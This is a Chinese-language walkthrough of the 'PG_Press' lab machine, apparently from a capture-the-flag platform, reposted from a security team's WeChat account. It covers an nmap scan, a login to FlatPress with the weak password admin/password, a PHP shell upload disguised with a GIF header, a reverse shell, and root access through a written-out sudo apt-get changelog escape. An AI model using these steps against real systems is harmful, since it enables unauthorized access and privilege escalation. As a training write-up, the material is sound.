PG_Press

admin 2025年4月2日22:34:08评论0 views字数 1956阅读6分31秒阅读模式

信息收集:

  1. root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.29
    Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-25 10:29 CST
    Nmap scan report for 192.168.216.29
    Host is up (0.0027s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
    |_http-server-header: Apache/2.4.56 (Debian)
    |_http-title: Lugx Gaming Shop HTML5 Template
    8089/tcp open  http    Apache httpd 2.4.56 ((Debian))
    |_http-generator: FlatPress fp-1.2.1
    |_http-server-header: Apache/2.4.56 (Debian)
    |_http-title: FlatPress
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=2/25%OT=22%CT=1%CU=30209%PV=Y%DS=4%DC=T%G=Y%TM=67BD2B2
    OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1
    OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
    OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

    Network Distance: 4 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 21/tcp)
    HOP RTT     ADDRESS
    1   2.21 ms 192.168.45.1
    2   2.21 ms 192.168.45.254
    3   2.50 ms 192.168.251.1
    4   2.73 ms 192.168.216.29

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 31.73 seconds

开放了80和8089的http服务

PG_Press

FlatPress框架试了一些弱口令都登录失败了,然后耗费3小时试了很多漏洞,最后看了下hints,没想到密码是password,,,,

使用admin/password成功登录系统,那就可以用exp了

PG_Press

上传shell后访问即可,php前面貌似得加上GIT89a,不然没法上传

PG_Press

成功RCE

PG_Press

反弹shell

PG_Press

常规信息收集发现可以无密码sudo执行apt-get

PG_Press

常规sudo提权:https://gtfobins.github.io/gtfobins/apt-get/#sudo

  1. sudo apt-get changelog apt
    !/bin/sh
PG_Press

拿到proof

PG_Press

原文始发于微信公众号(EuSRC安全实验室):PG_Press

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日22:34:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PG_Presshttps://cn-sec.com/archives/3907174.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息